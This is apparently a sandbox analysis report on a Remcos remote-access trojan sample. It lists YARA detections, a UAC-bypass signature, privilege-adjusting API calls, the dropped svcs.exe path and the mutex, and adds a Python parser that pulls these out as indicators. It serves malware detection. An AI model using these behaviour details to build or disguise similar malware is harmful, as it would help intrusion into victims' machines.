                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
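The signature rows of a Joe Sandbox report extract from the HTML with the table cells run together: "type: SAMPLE" is fused to "Matched rule:", and a process path is fused to its action ("...svcs.exeMutant created:"), often with a trailing "Jump to behavior" link label. The following Python is an added example, not code from Joe Sandbox or from this report: it splits such raw rows back into fields and aggregates which YARA rules hit which artefact types, plus the mutex, dropped file, child process and API-call sequence a hunter would lift from the report. The input rows are copied from this report with the long rule metadata trimmed to a few fields; the list of action labels is taken from the labels that appear in the report and is the only assumption the parser makes about the format.

```python
"""Split Joe Sandbox signature rows back into fields and collect IOCs.

Added example, not code from Joe Sandbox or from this report. The HTML
export runs table cells together, so "type: SAMPLE" is fused to "Matched
rule:" and a process path is fused to its action ("...svcs.exeMutant
created:"). The regexes below undo that and aggregate YARA hits per rule
and artefact type, plus mutex, dropped file, child process and API calls.
"""
import re
from collections import defaultdict

# Constructed input: rows copied from this report, with the long rule
# metadata trimmed to a few fields. Raw strings keep the backslashes.
SAMPLE_LINES = [
    r"Source: 1m70ggeepT.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild., Website = https://www.deadbits.org, Author = Adam M. Swanda",
    r"Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, scan_context = file, memory, threat_name = Windows.Trojan.Remcos",
    r"Source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, threat_name = Windows.Trojan.Remcos",
    r"Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)",
    r"Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00417952",
    r"Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0",
    r'Source: C:\Users\user\Desktop\1m70ggeepT.exeProcess created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" Jump to behavior',
    r'Source: unknownProcess created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"',
]

YARA_RE = re.compile(
    r"^Source: (?P<source>.+?), type: (?P<stype>[A-Z]+)Matched rule: "
    r"(?P<rule>\S+)\s*(?P<meta>.*)$"
)
# Action labels as they appear in the report's behaviour rows (assumed complete
# only for the rows used here; extend the tuple for other report sections).
ACTIONS = ("Mutant created", "Process created", "File created", "Code function",
           "File read", "Key opened", "Key value queried")
BEHAVIOR_RE = re.compile(
    r"^Source: (?P<source>unknown|.+?\.exe)(?P<action>" + "|".join(ACTIONS)
    + r"): (?P<value>.+?)(?:\s*Jump to behavior)?$"
)
# "key = value" pairs; the lookahead keeps commas inside values intact.
META_RE = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")


def parse_line(line):
    """Return one parsed row as a dict, or None for text that is not a row."""
    m = YARA_RE.match(line.strip())
    if m:
        return {"kind": "yara", "source": m["source"], "stype": m["stype"],
                "rule": m["rule"], "meta": dict(META_RE.findall(m["meta"]))}
    m = BEHAVIOR_RE.match(line.strip())
    if m:
        return {"kind": "behavior", "source": m["source"],
                "action": m["action"], "value": m["value"]}
    return None


def summarize(lines):
    """Aggregate parsed rows into per-rule hit data and a flat IOC set."""
    rules = defaultdict(lambda: {"count": 0, "types": set(), "sources": [], "meta": {}})
    iocs = {"mutexes": [], "dropped_files": [], "child_processes": [], "api_sequences": {}}
    for line in lines:
        row = parse_line(line)
        if row is None:
            continue
        if row["kind"] == "yara":
            hit = rules[row["rule"]]
            hit["count"] += 1
            hit["types"].add(row["stype"])
            hit["sources"].append(row["source"])
            hit["meta"].update(row["meta"])
            if row["stype"] == "DROPPED":
                iocs["dropped_files"].append(row["source"])
            continue
        action, value = row["action"], row["value"]
        if action == "Mutant created":
            # Keep only the object name; the \Sessions\<n>\BaseNamedObjects\ prefix depends on the session.
            iocs["mutexes"].append(value.rsplit("\\", 1)[-1])
        elif action == "Process created":
            # The image path precedes the quoted command line.
            iocs["child_processes"].append(value.split(' "', 1)[0])
        elif action == "Code function":
            # "<func_id> Api1,Api2,...,<func_id>": drop the repeated trailing id.
            func_id, _, apis = value.partition(" ")
            iocs["api_sequences"][func_id] = [a for a in apis.split(",") if a and a != func_id]
    for key in ("mutexes", "dropped_files", "child_processes"):
        iocs[key] = list(dict.fromkeys(iocs[key]))  # dedupe, keep first-seen order
    return {"rules": dict(rules), "iocs": iocs}


if __name__ == "__main__":
    report = summarize(SAMPLE_LINES)
    for name, hit in report["rules"].items():
        print(f"{name}: {hit['count']} hit(s) across {sorted(hit['types'])}")
    print(report["iocs"])
```

Feeding it the full row set of a report yields one entry per rule with the artefact types it fired on (SAMPLE, UNPACKEDPE, MEMORY, MEMORYSTR, DROPPED), which is the quickest way to see whether a rule only fires on unpacked memory and therefore needs a memory scan on the endpoint rather than a file scan.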
                      Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@6/3@2/1
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError | 0_2_00417952
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError | 3_2_00417952
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle | 0_2_0040F474
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource | 0_2_0041B4A8
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 0_2_0041AA4A
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | File created: C:\Users\user\AppData\Roaming\microsofts
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | Command line argument strings referenced in function 0_2_0040E9C5 (39 references, in report order; "×n" marks consecutive repeats): (x ×2, Software\, Rmc-3XK1S0, Exe ×2, Rmc-3XK1S0, Inj ×2, (x ×3, Mw ×3, 8SG, Mw, exepath, (x, 8SG, exepath, Mw, (x, licence, (x ×6, dMG, (x ×2, PSG, Administrator, User, del ×3
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Command line argument strings referenced in function 3_2_0040E9C5 (31 references, in report order; "×n" marks consecutive repeats): PG ×2, Software\, Exe, Inj ×2, PG ×3, 8SG, exepath, PG, 8SG, exepath, PG, licence, PG ×6, dMG, PG ×2, PSG, Administrator, User, del ×3
                      Source: 1m70ggeepT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: 1m70ggeepT.exe | Virustotal: Detection: 79%
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | File read: C:\Users\user\Desktop\1m70ggeepT.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\1m70ggeepT.exe "C:\Users\user\Desktop\1m70ggeepT.exe"
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | Process created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | Process created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                      Source: 1m70ggeepT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 1m70ggeepT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 1m70ggeepT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 1m70ggeepT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 1m70ggeepT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
